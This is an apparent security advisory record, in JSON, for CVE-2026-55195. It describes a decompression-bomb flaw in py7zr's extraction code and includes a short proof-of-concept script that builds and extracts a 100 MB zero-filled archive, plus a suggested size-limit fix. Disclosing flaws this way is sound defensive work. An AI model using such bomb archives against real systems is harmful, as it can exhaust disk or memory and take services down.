{"id":"CVE-2026-55195","aliases":["GHSA-gjrg-mpp7-g774","PYSEC-2026-2972"],"url":"https://o3.security/vulnerability/CVE-2026-55195","summary":"py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size","details":"py7zr's `Worker.decompress()` extracts archive entries without tracking total decompressed size. A crafted `.7z` file can exhaust disk or memory before the extraction completes.\n\nMeasured: 15.6 KB archive → 100 MB output (6,556:1 ratio).\n\n**Proof of concept:**\n\n```python\nimport py7zr, tempfile, os\n\n# create bomb: compress 100MB of zeros into ~15KB\nbomb_path = tempfile.mktemp(suffix='.7z')\nwith py7zr.SevenZipFile(bomb_path, 'w') as z:\n    import io\n    z.writef(io.BytesIO(b'\\x00' * 100 * 1024 * 1024), 'bomb.bin')\n\nprint(f'archive size: {os.path.getsize(bomb_path):,} bytes')\n\n# extract — no size check\nwith py7zr.SevenZipFile(bomb_path, 'r') as z:\n    z.extractall(path=tempfile.mkdtemp())\n\nprint('extracted 100 MB from ~15 KB archive')\n```\n\n**Root cause:** `Worker.decompress()` in `py7zr/worker.py` writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's `zipfile` `max_size` parameter.\n\n**Fix:** track cumulative decompressed bytes and raise before writing if a limit is exceeded:\n\n```python\nMAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable\n\ntotal = 0\nfor chunk in decompressed_chunks:\n    total += len(chunk)\n    if total > MAX_EXTRACT_SIZE:\n        raise py7zr.exceptions.DecompressionBombError(\n            f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes'\n        )\n    outfile.write(chunk)\n```\n\nTested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.","published":"2026-07-08T20:30:58.654Z","modified":"2026-08-12T03:51:15.877348906Z","cvss":null,"epss":{"score":0.00321,"percentile":0.25158,"asOf":"2026-09-17"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"PyPI","name":"py7zr","fixedVersion":"1.1.3"}],"fix":{"url":"https://github.com/miurahr/py7zr/commit/28faf107b64374fa5a02bfb93aa2024e281ca97b","label":"miurahr/py7zr@28faf10"},"references":[{"type":"WEB","url":"https://github.com/miurahr/py7zr/releases/tag/v1.1.3"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/55xxx/CVE-2026-55195.json"},{"type":"ADVISORY","url":"https://github.com/miurahr/py7zr/security/advisories/GHSA-gjrg-mpp7-g774"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-55195"},{"type":"FIX","url":"https://github.com/miurahr/py7zr/commit/28faf107b64374fa5a02bfb93aa2024e281ca97b"},{"type":"PACKAGE","url":"https://github.com/miurahr/py7zr"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:15.877348906Z"}}